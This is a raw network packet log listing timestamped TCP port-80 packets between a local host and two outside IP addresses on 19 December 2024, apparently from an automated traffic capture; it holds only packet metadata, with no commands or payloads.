                                                                                                                    Dec 19, 2024 07:52:24.621848106 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.626406908 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.626514912 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.626538992 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.631155968 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.631232977 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.631294012 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.635915995 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.636009932 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.636024952 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.640629053 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.640718937 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.640743017 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.645396948 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.645554066 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.645597935 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.649178982 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.649296045 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.649300098 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.653023958 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.653098106 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.653561115 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.656848907 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.656893969 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.656974077 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.660551071 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.660625935 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.660659075 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.664419889 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.664491892 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.664513111 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.668210030 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.668292999 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.668319941 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.672034979 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.672148943 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.672171116 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.723692894 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.758656979 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.758728981 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.758810043 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.760448933 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.779400110 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.779414892 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.779578924 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.780797958 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.780857086 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.780910969 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.783823967 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.783838034 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.783884048 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.786674976 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.786782026 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.786803961 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.789479017 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.789566994 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.789589882 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.792340994 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.792411089 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.792503119 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.795098066 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.795175076 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.795197964 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.797760010 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.797862053 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.797863007 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.800398111 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.800527096 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.800532103 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.802985907 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.803056002 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.803106070 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.805630922 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.805706024 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.805721998 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.808291912 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.808372021 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.808381081 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.810863018 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.810956955 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.810980082 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.813520908 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.813575029 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.813621998 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.816153049 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.816224098 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.816303968 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.818741083 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.818814993 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.818844080 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.821419001 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.821547031 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.821559906 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.824016094 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.824121952 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.824208021 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.826659918 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.826740980 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.826872110 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.829390049 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.829451084 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.829472065 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.831835985 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.831967115 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.832034111 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.834477901 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.834562063 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.834582090 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.837102890 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.837239027 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.837239981 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.839713097 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.839812040 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.839814901 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.842335939 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.842449903 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.842510939 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.845082998 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.845159054 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.845238924 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.847574949 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.847651005 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.847719908 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.850198984 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.850269079 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.850327969 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.852816105 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.852937937 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.852938890 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.855462074 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.855556011 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.855601072 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.858107090 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.858143091 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.858211040 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.860788107 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.860884905 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.860925913 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.863280058 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.863403082 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.863406897 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.866053104 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.866087914 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.866117954 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.868573904 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.868648052 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.868654966 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.871134043 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.871189117 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.871237993 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.873719931 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.873821020 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.950788975 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.950844049 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.950953007 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.952049971 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.952138901 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.952250957 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.954606056 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.954713106 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.954814911 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.971580029 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.971647978 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.971740961 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.972609997 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.972729921 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.972806931 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.974771023 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.974891901 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.974997044 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.976958990 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.977215052 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.977288961 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.979044914 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.979154110 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.979332924 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.981118917 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.981199980 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.981301069 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.983189106 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.983289003 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.983367920 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.985217094 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.985323906 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.985399961 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.987242937 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.987323046 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.987382889 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.989187002 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.989283085 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.989357948 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.991138935 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.991249084 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.991307974 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.993068933 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.993180037 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.993249893 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.995044947 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.995083094 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.995127916 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.996874094 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.996989965 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.997045040 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.998754025 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.998841047 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.998912096 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.000638008 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.000716925 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.000768900 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.002466917 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.002564907 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.002666950 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.004354954 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.004487991 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.004563093 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.006201982 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.006309032 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.006426096 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.008078098 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.008225918 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.008285046 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.010044098 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.010152102 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.010251045 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.011928082 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.011962891 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.012018919 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.013650894 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.013855934 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.013910055 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.015531063 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.015625000 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.015794992 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.017484903 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.017571926 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.017699003 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.019351006 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.019475937 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.019581079 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.021092892 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.021204948 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.021277905 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.022944927 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.023060083 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.023122072 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.024812937 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.024991989 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.025194883 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.026663065 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.026757002 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.026810884 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.028567076 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.028618097 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.028762102 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.030390978 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.030493021 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.030538082 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.032234907 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.032341957 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.032402039 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.034136057 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.034266949 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.034342051 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.036058903 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.036111116 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.036214113 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.037782907 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.037878036 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.037981033 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.039824963 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.039880991 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.039954901 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.041573048 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.041675091 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.041785955 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.043376923 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.043508053 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.043591022 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.045281887 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.045332909 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.045394897 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.047065020 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.047197104 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.047334909 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.048952103 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:25.098742962 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:25.315083027 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:49.262785912 CET4971180192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:49.382452011 CET804971194.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:49.385200024 CET4971180192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:49.390074968 CET4971180192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:49.390074968 CET4971180192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:49.509625912 CET804971194.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:49.509637117 CET804971194.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:50.769890070 CET804971194.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:50.817415953 CET4971180192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:50.939450979 CET4971280192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:51.058917999 CET804971294.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:51.061435938 CET4971280192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:51.061706066 CET4971280192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:51.061706066 CET4971280192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:51.181216002 CET804971294.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:51.181299925 CET804971294.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:52.585639000 CET804971294.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:52.629853964 CET4971280192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:52.730038881 CET4971380192.168.2.8109.70.26.37
                                                                                                                    Dec 19, 2024 07:52:52.849633932 CET8049713109.70.26.37192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:52.849761963 CET4971380192.168.2.8109.70.26.37
                                                                                                                    Dec 19, 2024 07:52:52.849927902 CET4971380192.168.2.8109.70.26.37
                                                                                                                    Dec 19, 2024 07:52:52.849965096 CET4971380192.168.2.8109.70.26.37
                                                                                                                    Dec 19, 2024 07:52:52.969374895 CET8049713109.70.26.37192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:52.969623089 CET8049713109.70.26.37192.168.2.8
                                                                                                                    Dec 19, 2024 07:53:14.751261950 CET8049713109.70.26.37192.168.2.8
                                                                                                                    Dec 19, 2024 07:53:14.751358032 CET4971380192.168.2.8109.70.26.37
                                                                                                                    Dec 19, 2024 07:53:14.751430035 CET4971380192.168.2.8109.70.26.37
                                                                                                                    Dec 19, 2024 07:53:14.870901108 CET8049713109.70.26.37192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:01.645839930 CET4971180192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:01.645931959 CET4971280192.168.2.894.156.177.51
